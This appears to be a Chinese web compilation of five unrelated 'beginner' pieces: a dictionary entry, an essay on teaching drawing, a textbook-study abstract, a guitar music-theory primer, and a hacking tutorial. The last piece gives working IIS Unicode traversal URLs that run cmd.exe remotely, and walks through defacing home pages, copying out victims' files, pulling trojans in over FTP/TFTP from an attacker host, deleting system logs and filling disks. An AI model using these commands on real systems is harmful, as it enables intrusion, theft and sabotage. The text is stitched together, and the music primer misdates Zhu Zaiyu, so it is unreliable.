以下是小编为大家准备的入门绕口令,本文共5篇,供大家参考借鉴,希望可以帮助到有需要的朋友。本文原稿由网友“柚柚咔酱”提供。
篇1:入门
入门
入门rù mén[释义]①(动)(~儿)得到门径;初步学会。工作刚~。(作谓语)
②(动)指初级读物(多用做书名)。
[构成] 动宾式:入|门篇2:浅议绘画入门
浅议绘画入门
浅议绘画入门辽宁省盘锦市兴隆台区实验幼儿园 邵洪艳
“入门”这个简单明了的词一听一看便懂,但要真做起来就很难了。任何事从入门开始都有门外徘徊的过程。有人说“不知从何处下手”这就对了,因为您没有入门嘛!那么对初学绘画的人来说:难也不难,不难也难,这就取决于教师的指导方式方法了。
一、从面到体、透视、构图入门
初学者拿笔拿画夹不难,但怎样去在纸上表现具体物体或记忆中的物体就很难了。教师要根据不同的物体平面引导下手,再展现立体。例如,正方形,开始四条相等的边组合围起是形,而再加上五条线即成了正方体,这个过程叫物体的“透视”法。
透视对学生而言很陌生,教师要针对不同的物体解释本词的专业术语。首先讲明透视在绘画中的意义极其作用。并且阐明透视的规律,透视的种类。只有掌握它才能准确表现物体。平行透视、成角透视、圆透视,并示范给学生,要求学生掌握运用粗浅的透视作图方法,难点,通过反复练习去理解透视原理。
透视法也可以潜移默化为事物的观察法:形、体、光下的空间物象等等。
构图,简单的讲就是物体在画面上的安排,教师要有代表性地列举几种不同形式的构图方法,让学生分析他们的形态变化和展示方位,这样给学生空间认识过程和有效区别在透视构图中的重要作用。学生做完后教师要剖析不同位置的构图,用最佳方法引导,然后让学生讨论分析:一是会更有科学性;二是使学生通过对比观察能在很短的时间内指出相互差别,再在原位不动去画第二张作品,无疑事半功倍。
二、掌握结构和比例入门
教学中怎样去分析物体的结构。有经验的教师往往都采取从物体平面入手。将一张六开纸给学生画,画准物体的透视关系后,再在四个角画上垂线,按透视规律连或画线。这样既能巩固透视知识又能进一步理解简单的形体结构,教师要侧重提示学生什么是比例关系及在绘画中的重要作用。让学生学会怎样去找比例,如何测量等知识及方式方法。教师设计大小不同的物体给学生练习。通过反复比较认真测量,把握好轮廓,指导学生找准所画物体关系和比例关系,并能教给准确修改和修改方法。
三、保持良好心态,轻松入门
在绘画教学中除认真严格要求学生外,要创造舒适活跃的课堂气氛,调整好学生的良好心态,平稳情绪入画。使学生能在严肃的纪律中谨慎地运用绘画知识及其技能完成作业,心甘情愿地接受指教,完成教学任务。
教师一定要认真当面批改学生作业,指出优缺点,评价学习态度。教师评定时先肯定优点,让学生兴趣高昂,然后用不同并不敏感的'语言指出不足之处,让学生高兴地接受,提示学生整体布局不统一或者透视关系没处理好等重点,学生会立刻将画面与物体对照、分析、修改,再观察再修改,直至满意为止。这样轻松愉快,严格认真的课堂教学,使学生不但有信心,有收获,有欲望,更有师生的新感情,何乐而不为呢?
四、多角度、多元化表现入门
绘画是时空艺术的表现体,画面物体空间有很大的伸缩性,可高可低,可左可右,可静可动,可远可近,可浓可淡,可大可小等等。与其说方位不妥,不如称角度不对。角度靠透视,方位靠布局,二者相辅相成,缺一不可,同一组静物从不同角度去表现,就提出不同程度上的难点,针对这种情况,要指导学生如何去构图,在光照下如何对个别物体进行适当的调整和移位,以达到构图和画面的完美性,提高表现手法之技巧。亦可调整,座位补救,教学中教师要灵活调整学生位置变化去画同一种物体,体会不同方位下的绘画方法和构图方法,力求达到预期的教学目的和知识的有效传授乃至利用。
针对绘画入门也要分年龄、基础,不同对待。通过入门的教学去让每一个学生加速提高绘画基础,掌握绘画原理,运用绘画技能技巧,由看物体达到观察物体,定向,展示物体,美化物体,为酿造绘画难、入门难的课堂教学提供有效的学习条件。绘画入门这只是其中的有效途径之一,其余的还有待教学实验中进一步探索和研究。
篇3:浅析《英语听力入门》
浅析《英语听力入门》
本文在借鉴西方学者教材评估原则的基础上,探讨了在中国英语语言环境下大学英语教材的评估应坚持的原则,并通过调研,对目前众多大学选用的<英语听力入门2000>进行了实证分析.
作 者:李端阳 李元 作者单位:李端阳(广西师范大学,外国语学院;桂林航天工业高等专科学校,广西,桂林,541000)李元(桂林航天工业高等专科学校,广西,桂林,541000)
刊 名:考试周刊 英文刊名:KAOSHI ZHOUKAN 年,卷(期): “”(7) 分类号:H3 关键词:教材评估 中国语言环境 原则篇4:入门吉他怎么学
入门吉他怎么学
入门吉他知识?有哪些入门的知识?请看下面的新手入门基础乐理知识吧。
一、基础知识
作曲家创作乐曲,也象文学家写诗歌、小说一样,有一套表情达意的体系,那就是音乐语言。音乐语言包括很多要素:旋律、节奏、节拍、速度、力度、音区、音色、和声、复调、调式、调性等。一首音乐作品的思想内容和艺术美,要通过多种要素才能表现出来。
【旋律】又称曲调,它是按照一定的高低、长短和强弱关系而组成的音的线条。它是塑造音乐形象最主要的手段,是音乐的灵魂。
【节奏】各音在进行时的长短关系和强弱关系。由于不同高低的音同时也是不同长短和不同强弱的音,因此旋律中必须包括节奏这一要素。
【节拍】强拍和弱拍的均匀的交替。节拍有多种不同的组合方式,叫?quot;拍子'',正常的节奏是按照一定的拍子而进行的。
【速度】快慢的程度。为使音乐准确地表达出所要表现的思想感情,必须使作品按一定的速度演唱或演奏。
【力度】强弱的程度。音的强弱变化对音乐形象的塑造也起着很重要的作用。
【音区】音的高低范围。不同音区的音在表达思想感情时各有不同的功能和特点。
【音色】不同人声、不同乐器及不同组合的音响上的特色。通过音色的对比和变化,可以丰富和加强音乐的表现力。
【和声】两个以上的音按一定规律同时结合。和弦进行的强和弱、稳定与不稳定、协和与不协和,以及不稳定、不协和和弦对稳定、协和和弦的倾向性,构成了和声的功能体系。和声的功能作用,直接影响到力度的强弱、节奏的松紧和动力的大小。此外,和声的音响效果还有明暗的区别和疏密浓淡之分,从而使和声具有渲染色彩的作用。
【复调】两个或几个旋律的同时结合。不同旋律的同时结合叫做对比复调,同一旋律隔开一定肘间的先后模仿称为模仿复调。运用复调手法,可以丰富音乐形象,加强音乐发展的气势和声部的独立性,造成前呼后应、此起彼落的效果。
【调式】从音乐作品的旋律与和声中所用的高低不同的音归纳出来的音列。这些音互相联系并保持着一定的倾向性。而调性则是调式的中心音(主音)的音高。在许多音乐作品中,调式和调性的转换和对比,是体现气氛、色彩、情绪和形象变化的重要手法。
音乐语言的各种要素互相配合,具有千变万化的表现力。旋律尽管是音乐的灵魂,但其它要素起了变化,音乐形象就会有不同程度的改变。在一定条件下,其它要素甚至可起重要作用。
二、音及音高
音是由于物体的振动而产生的。在自然界中能为我们人的听觉所感受的音是非常多的,但并不是所有的音都可以作为音乐的材料。在音乐中所使用的音,是人们在长期的生产斗争和阶级斗争中为了表现自己的生活和思想感情而特意挑选出来的。这些音被组成为一个固定的体系,用来表现音乐思想和塑造音乐形象。
音有高低、强弱、长短、音色等四种性质。 音的高低是由于物体在一定时间内折振动次数(频率)而决定的。振动次数多,音则高;振动次数少,音则低。
音的长短是由于音的延续时间的不同而决定的。音的延续时间长,音则长;音的延续时间短,音则短。
音的强弱是由于振幅(音的振动范围的幅度)的大小而决定的。振幅大,音则强;振幅小,音则弱。 音色则由于发音体的性质、形状及其泛音的多少等不同。
音的以上四种性质,在音乐表现中都是非常重要的,但音的高低和长短则具有更为重大的意义。试以《社会主义好》这首歌为例,不管你用人声来演唱或用乐器来演奏,用小声唱或是大声唱,虽然音的强弱及音色都有了变化,仍然很容易辨认出这支旋律。但是,假如将这首歌的音高或音值加以改变的话,则音乐形象就会立即受到严重的破坏。因此,不管创作也好,演奏演唱也好,对音高和音值应加以特别的注意。
由于音的振动状态的规则与不规则,音被分为乐音与噪音两类。音乐中所使用的主要是乐音,但噪音也是音乐表现中不可缺少的组成部分。
在我国民族音乐里,噪音的使用具有相当丰富的表现能力。如在戏曲音乐中,打击乐器在其他艺术表现手段的配合下,在塑造人物形象,表现各种思想情感方面,其作用是异常明显的,这是世界音乐文化中非常具有特色的一部分,是值得我们很好地研究和学习的。
我们平时所听到的某一个音,都不只是一个音在响,而是许多个音的结合,这种声音叫做复合音。复合音的产生是由于发音体(以弦为例)不仅全段在振动,它的各部分(二分之一、三分之一、四分之一……等)也分别的同时在振动。由发音体全段振动而产生的音叫做基音,也就是最易听见的声音,由发音体各部分振动而产生的音叫做泛音。这些音是我们听觉所不易听出来的。
三、乐音体系
在音乐中使用的、有固定音高的音的总和,叫做乐音体系。 乐音体系中的音,按照上行或下行次序排列起来,叫做音列。
在钢琴上可以明显地看出乐音体系中所使用的音和音列。现在最大的钢琴包括有八十八个音高不同的音。除此之外的音在音乐中差不多是不用的。
乐音体系中的各音叫做音级。音级有基本音级和变化音级两种。 乐音体系中,七个具有独立名称的音级叫做基本音级。钢琴上白键所发出的音是与基本音级相符合的。
基本音级的名称是用字母和唱名两种方式来标记的。 钢琴上五十二个白键循环重复地使用七个基本音级名称。 两个相邻的具有同样名称的音叫做八度。
升高或降低基本音级而得来的音,叫做变化音级。将基本音级升高半音用“升”或“#”来标明;降低半音用“降”或“b”来标明;升高全音用“重升”或“×”来标明;降低全音用“重降”或“bb”来标明。
在德国体系中,用加字尾的办法来标明变化音级:is(升),es(降),isis(重升),eses(重降)。
但降E不用Ees而用es;降A不用Aes而用as;降h不用hes而用b。
四、音的分组
前面已经讲过,钢琴上五十二个白键循环重复地使用七个基本音级名称,因此,在音列中便产生了许多同名的音,为了区分音名相同而音高不同的各音,我们将音列分成许多个“组”。
在音列中央的的一组叫做小字一组,它的音级标记用小写字母并在右上方加数字1来表示,如c1d1e1等。
比小字一组高的组顺次定名为:小字二组、小字三组、小字四组、小字五组。 小字二组的标记用小写字母并在右上方加数字2来表示,如c2d2e2等。其他各组依次类推。
比小字一组低的组,依次定名为小组、大字组、大字一组及大字二组。 小字组各音的标记用不带数字的小写字母来表示,如cde等。
大字组用不带数字的大写字母来标记,如CDE等。 大字一组用大写字母并在右下方加数字1来标明,如C1D1E1等。
大字二组用大写字母并在右下方加数字2来标明,如A2B2等。
音域有总的音域和个别的人声或乐器的音域两种。
总的音域是指音列的总范围,即从它的最低音到最高音(C2-c5)间的距离而言。
个别的人声或乐器的音域是指在整个音域中所能达到的那一部分,如钢琴的音域是A2-c5。音区是音域中的一部分,有高音区、中音区、低音区三种。在整个音域中,小字组、小字一组和小字二组属于中音区。小字三组、小字四组和五组属高音区,大字组、大字一组和大字二组属低音区。各种人声和各种乐器的音区划分,往往是不相符合的。如男低音的高音区是女低音的低音区等。各音区的特性音色在音乐表现中,有着重大的作用。高音区一般具有清脆、嘹亮、尖锐的特性;而低音区则往往给人以浑厚、笨重之感。
四、谱号、五线谱、音律
谱号
前面已经讲过,在五线谱上音的位置愈高,音也愈高,反之音的位置愈低,音也愈低,但到底高多少?低多少?却无法确定。在五线谱上要确定音的高低,必须用谱号来标明。这种谱号记在五线谱的某一条线上,便使这条线具有了固定的音级名称和高度,同时也确定了其他各线上或间内的音级名称和高度。
通常用的谱号有三种:
G谱号 表示小字一组的g,记在五线谱的第二线上,叫高音谱号;另外有记在第一线上的,叫古法国式高音谱号。
F谱号表示小字组的f,记在五线谱的第四线上,叫低音谱号;另外还有记在第五线上的,叫倍低音谱号。
C谱号 表示小字一组的c,可记在五线谱的任何一线上。
目前被采用的C谱号有C三线谱号(中音谱号)为中音提琴所用,有时也长号所用。C四线谱号(次中音谱号)为大提琴、大管和长号所用。其他C谱号一般较少应用。
使用许多谱号的目的是为了避免过多的加线,以使写谱和读谱更加方便。 各种谱号可以单独使用,也可以连接起来使用,如高、低音谱号所组成的大谱表便是。
五线谱
用来记载音符的五条平行横线叫做五线谱。
五线谱的五条线和由五条线所形成的间,都自下而上计算的。假使音乐作品是写在数行五线谱上,那么,这数行五线谱还要用连谱号连结起来。
连谱号包括起线(连结数行五线谱的垂直线)和括线(连结数行五线谱的括弧)两个组成部分。
括线分花的和直的两种。花括线为钢琴、风琴、手风琴、竖琴、扬琴、琵琶等乐器记谱使用。
直括线为合奏、合唱、乐队记谱用。在总谱中用直括线来连接同为乐器,把它们分成完全的或不完全的乐器组。有时在直括线之外还加上辅助括线(花的或直的)来连接同种乐器。
在总谱中,独唱独奏声部如果只包括一两行五线谱的话,左边只画一条起线,而不加括线。为了标记过高或过低的音,在五线谱的上面或下面还要加上许多短线,这些短线叫做加线,在五线谱上面的叫上加线,下面的叫下加线。
由于加线而产生的间,叫做加间,在五线谱上面的加间叫上加间,下面的叫下加间。加线和加间的计算方法是:上加线和上加间,由下向上计算,下加线和下加间由上向下计算。
音律
乐音体系中各音的绝对准确高度及其相互关系叫做音律。音律是在长期的音乐实践发展中形成的,并成为确定调式音高的基础。
在历史发展过程中,曾采用过各种各样的方法来确 定乐音体系中各音的高度,其中主要的、为大家所熟知的.有“纯律”、“五度相生律”和“十二平均律”三种。
目前被世界各国所广泛采用的是“十二平均律”。但“纯律”和“五 度相生律”在音乐生活中仍继续发生着影响并具有重大的意义。
五、十二平均律、五度相生律、纯律
十二平均律
将八度分成十二个均等的部分-半音-的音律叫做十二平均律。
十二平均律早在古代希腊时便有人提出了,但并未加以科学的计算。世界上最早根据数学来制订十二平均律的是我国明朝大音乐家朱载(土育)(1854年)。
半音是十二平均律组织中最小的音高距离。两音间的距离等于两个半音的叫做全音。八度内包括有十二个半音,也就是六个全音。
在音列的基本音级中间,除了E到F、B到C是半音外,其余相邻两音间的距离都是全音。
在钢琴上,相邻的两个琴键(包括黑键)都构成半音,隔开一个琴键的两个音则都构成全音。
五度相生律
根据复合音的第二分音和第三分音的纯五度关系,即由某一音开始向上推一纯五度,产生次一律,再由次一律向上推一纯五度,产生再次一律,如此继续相生年定出的音律叫做五度,产生再次一律,如此继续相生所定出的音律叫做五度相生律。
例如五度相生律所订出的七个基本音级间的音高关系,和十二平均律中七个基本音级的音高关系是不同的。
虽然EF、BC之间亦为半音,但比十二平均律中的半音要小。其余相邻两音级之间虽然亦为全音,但比十二平均律中的全音要大。这种音高的差异就是由于定律方法的不同而产生的。
篇5: 快速入门
今天的内容是获得主机的信息,
快速入门
。 我们要黑一台主机,首先要了解它的信息,
包括它的类型,用户列表,目录,端口,漏洞等等。
首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)第一部,呵呵,
先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,
我们应该知道它的ip,很简单,ping它一下就可以了。ping www.flyingfish.com,看看窗口里有
了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人
是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,
禁止ping,不过这种可能很小。知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
21--ftp 重要哦
23--telnet 欢呼吧
25-smtp 尽管重要,但似乎没什么可利用的 53--domain 同上
79--finger 可知道用户信息了
80--http 要看网页,没它不行吧
110--pop 收信的
139--netbios 共享用的,很有利用价值哦
3389--win2000超级终端 呵呵,这个好!
其实端口有上千种,这些最最常用
我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等
很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估
计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
那么我们该如何应对呢?ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)
随便猜个,错了,闪人!
二,一切从基础开始
由于winntsystem32cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以
下请求:(假设11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,
如果inetpub目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
如果成功,那么在浏览区可看到如下信息:
Directory of C:inetpubscripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
是不是有自己机器的感觉了,正点!就是这种感觉!
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir (这个命令同样道理)
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe
会dos的朋友一定懂其意义了,不懂的请去看书 .
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
三,实战演练
1,修改主页!(是不是很爽?)
一般主页位置在c:inetpubwwwroot下,但要是改了路径,就需要找找了。
最方便的方法:在浏览器里输入 11.11.22.22/.ida要是有漏洞,那在浏览器里 便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。
分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上
有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入
这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意
实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,
default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm
那么我们就修改它吧!
最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:autoexe.bat就是把
cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:autoexec.bat
就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm
回应为:HTTP 500 - 内部服务器错误 通过对cmd的分析,袁哥得出一条简便的方法,加入“符号
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd”.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd“.exe?/c+echo+2001730+>>c:inetpubwwwrootindex.htm
回应为:cgi错误,不用理会
两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe
为另一个exe,记住路径,用copy后的来echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm
2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,
那就应该用改好的主页上传,这个我们后面介绍,
几点忠告:
1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
2,echo前记得帮他们做好备份
3,不准在主页里加入恶性语句
2,下载文件
要是有什么有用的文件被你发现,那我们如何下载呢?
最简单的方法:把文件copy至网页目录下。copy c:emailbaby.eml c:inetpubwwwrootbaby.zip,然后,
下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
别的方法:对不起,没想好:)
3,最重要的上传
一般方法:ftp法
首先建一个ftp脚本文件:c:hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
echo+open ftp.cshu.com(ftp主机) >c:hehe.haha
echo+user yourname >>cc:hehe.haha (yourname是用户名)
echo+yourpasswd >>c:hehe.haha (yourpasswd是密码)
echo+get setup.exe >>c:hehe.haha 要下载的文件
echo+quit >>c:hehe.haha
完了以后:ftp+/s:c:hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe
就会出现在当前目录了(也就是cmd所在目录)
别忘了先上传到ftp主机,不要做马大哈哦!
最简单的方法:tftp法。
这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,
利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)
安装好后运行,别忘了设置好默认目录,否则会找不到文件 tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe(ihateu.exe在默认目录里)
1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!
学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
4,如何清除痕迹
虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
C:winntsystem32logfiles*.*
C:winntssytem32config*.evt
C:winntsystem32dtclog*.*
C:winntsystem32*.log
C:winntsystem32*.txt
C:winnt*.txt
C:winnt*.log
全……擦掉!
四,细节问题。
1,遇到长文件名怎么办?
c:program files
就用c:”program20%files\"
2,遇到空格怎么办?
20%代替喽,或者xx yy=xxyy~1
3,如何做个很大的文件?
目的就是破坏啦!我不喜欢不过教教你们啦
@echo off
echo big >c:a.a
:h
copy c:a.a+c:a.a c:a.a
goto h
注意不要乱来啊!
4,输入命令,没反应或反应不对。
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!
看在你看到这里那么给我面子的份上,在给你几个吧!
www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: 或www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: 或www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
不一定有用哦!
5,如何找到unicode漏洞的主机
呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
